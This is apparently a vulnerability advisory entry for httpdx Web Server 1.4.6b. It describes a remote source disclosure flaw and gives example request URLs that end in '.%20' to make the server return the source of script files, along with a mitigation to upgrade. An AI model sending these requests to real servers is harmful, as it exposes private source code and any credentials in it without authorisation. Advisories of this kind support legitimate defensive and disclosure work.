vendor:
httpdx Web Server
by:
Dr_IDE
6.4
CVSS
MEDIUM
Remote Source Disclosure
200
CWE
Product Name: httpdx Web Server
Affected Version From: 1.4.6b
Affected Version To: 1.4.6b
Patch Exists: Yes
Related CWE: N/A
CPE: httpdx
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XPSP3
Unknown
httpdx <= 1.4.6b Remote Source Disclosure
httpdx Web Server <= 1.4.6b is a Windows based HTTP server. This is the latest version of the application available. httpdx is vulnerable to remote arbitrary source code disclosure by the following means. http://[ webserver IP]/[ file ][.%20] http://172.16.2.101/index.html.%20 http://172.16.2.101/test.py.%20 http://172.16.2.101/test.php.%20
Mitigation:
Upgrade to the latest version of httpdx Web Server